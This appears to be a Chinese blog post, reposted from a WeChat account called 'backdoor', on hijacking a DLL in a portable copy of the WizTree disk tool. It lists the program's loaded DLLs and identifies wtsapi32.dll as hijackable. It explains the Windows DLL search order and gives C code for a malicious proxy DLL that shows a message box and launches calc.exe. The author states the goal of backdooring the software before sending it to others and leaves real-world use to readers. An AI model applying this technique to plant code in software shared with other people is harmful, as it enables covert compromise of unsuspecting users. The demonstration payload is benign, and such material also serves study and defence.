背景
今天磁盘提示没空间了,找天哥要了一份检查磁盘大文件的工具WizTree 。到手之后发现他把整个安装目录都打包过来,解压后主程序能直接运行。像这种开箱即用的软件想看看有没有可以利用点,比如弹个窗留个后门啥的,到时候发给别人

。
目录内容挺简单的,locale文件夹是语言包。两个主程序,分别对应是32位和64位。
运行一下,检查加载Dll列表,看看有没有可以利用的。
C:WindowsSystem32wow64log.dll
D:APPWizTreempr.dll
D:APPWizTreeoleacc.dll
D:APPWizTreewinmm.dll
D:APPWizTreeversion.dll
D:APPWizTreenetapi32.dll
D:APPWizTreewinhttp.dll
D:APPWizTreeSHFolder.dll
D:APPWizTreeNETUTILS.DLL
D:APPWizTreeOLEACCRC.DLL
C:WindowsSysWOW64rpcss.dll
D:APPWizTreewtsapi32.dll
D:APPWizTreeWINSTA.dll
D:APPWizTreeolepro32.dll
D:APPWizTreeURL.DLL
D:APPWizTreeIEFRAME.dll
D:APPWizTreeiertutil.dll
D:APPWizTreeUSERENV.dll
D:APPWizTreeWKSCLI.DLL
D:APPWizTreePROPSYS.dll
D:APPWizTreeprofapi.dll
D:APPWizTreeCFGMGR32.dll
D:APPWizTreeedputil.dll
D:APPWizTreeVAULTCLI.dll
D:APPWizTreeurlmon.dll
D:APPWizTreesrvcli.dll
D:APPWizTreeSspiCli.dll
发现存在可劫持Dll
wtsapi32.dll
程序加载路径
D:APPWizTreewtsapi32.dll
主程序启动会加载路径当前路径下 wtsapi32.dll,但是当前目录下没有此Dll文件,根据Dll路径搜索目录顺序我们可以分析,主程序运行时加载wtsapi32.dll就是加载C:WindowsSystem32wtsapi32.dll 。
DLL路径搜索目录顺序
1. 进程对应的应用程序所在目录
2. 系统目录(即%windir%system32)
3. 16位系统目录(即%windir%system)
制作恶意Dll,生成转发Dll代码(使用大佬工具一键生成)
修改代码实现弹窗和打开计算器
// 弹窗
MessageBox(NULL, L"恭喜你中招了", L" Dll 劫持", MB_OK);
// 执行exe
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcess(TEXT("C:\Windows\System32\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
至于实战咋利用大家就各自发挥了,我相信大家骚操作很多,这里我就不献丑了,免得大家笑话。用到的工具Github上有很多,大家可以自行去下载,这里就不放出来了。
文章有点水,但是新鲜,就是今天上午的事。嘿嘿,主要是想提醒大家公众号换头像了
!
原文始发于微信公众号(backdoor):一次 DLL 劫持实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论